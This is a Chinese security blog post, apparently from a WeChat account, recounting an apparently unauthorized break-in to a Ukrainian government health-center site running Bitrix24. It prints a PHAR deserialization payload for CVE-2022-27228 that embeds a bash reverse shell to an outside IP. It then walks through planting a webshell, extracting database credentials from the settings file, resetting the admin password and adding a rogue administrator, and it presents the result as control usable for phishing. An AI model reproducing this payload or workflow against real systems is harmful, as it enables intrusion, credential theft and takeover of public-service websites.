今天的主角:https://*****.*****.g*v.ua/
0x01 外网打点
先查询一下服务器开放的端口 我都去试过了 没有任何可利用的信息
通过浏览器插件找到某处js里似乎是有该网站的特征信息 bitrix
去google上查询了发现是Ru的一套cms系统 bitrix24 去查阅相关漏洞 发现了CVE-2022-27228.
这个漏洞cvss评分挺高 应该是高危洞 直接找poc测一下 发现确实存在漏洞.(找了很久 才从github上找到 不过现在仓库已经无了)
直接通过利用脚本反弹Shell后写PHPshell 然后连接.
<?php __HALT_COMPILER(); ?>f0 O:25:"BitrixMainEntityResult":2:{s:12:" * isSuccess";b:0;s:9:" * errors";O:36:"BitrixMainUserConsentDataProvider":1:{s:7:" * data";a:2:{i:0;O:26:"CAdminDraggableBlockEngine":2:{s:10:" * engines";a:1:{i:0;a:1:{s:5:"check";s:6:"system";}}s:7:" * args";s:20:"bash -i >& /dev/tcp/8.***.**.**/6666 0>&1";}i:1;s:5:"check";}}} test.txt 炦c 千?? text緲?坈+rO 6?]]?'? GBMB
https://*****.*****.g*v.ua/***.php
查看了下它的IP 192.168.105.55 确实是在内网之中,那就有了进一步操作渗透内网的可能
数据库文件是存在 /bitrix/.settings.php 中, so 我们直接去查找.
returnarray('utf_mode'=>array('value'=>false,'readonly'=>true,),'cache_flags'=>array('value'=>array('config_options'=>3600.0,'site_domain'=>3600.0,),'readonly'=>false,),'cookies'=>array('value'=>array('secure'=>false,'http_only'=>true,),'readonly'=>false,),'exception_handling'=>array('value'=>array('debug'=>true,'handled_errors_types'=>4437,'exception_errors_types'=>4437,'ignore_silence'=>false,'assertion_throws_exception'=>true,'assertion_error_type'=>256,'log'=>NULL,),'readonly'=>false,),'connections'=>array('value'=>array('default'=>array('className'=>'\Bitrix\Main\DB\MysqliConnection','host'=>'localhost','database'=>'c8aritmolog','login'=>'****************','password'=>'*****************','options'=>2.0,),),'readonly'=>true,),'crypto'=>array('value'=>array('crypto_key'=>'61ffea2a5e26b50************',),'readonly'=>true,),);
OK. 让我们连接上数据库:
查看用户表 B_User 发现有非常多的用户
admin的密码Cmd5解不开 于是直接利用官方程序重置Admin的Password.
发现页面回显 1 说明成功重置了Admin的密码为 B*******456
访问 https://*****.*****.g*v.ua/bitrix/admin/#authorize 输入重置后的账密 成功进入后台.
访问 https://*****.*****.g*v.ua/bitrix/admin/user_admin.php?lang=en 进入用户管理 发现还有人往里边Sql注入......
创建管理用户 Bi*******8rt|******* 并将admin的密码改回
至此 完全控制该站点 可修改网站任意参数,可进行部署恶意链接 钓鱼等操作.
0x02 后渗透
由于该题材过于敏感,工具和详细渗透报告之后会发在纷传圈子里
原文始发于微信公众号(星悦安全):记一次渗透东欧某国人民身体健康中心
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论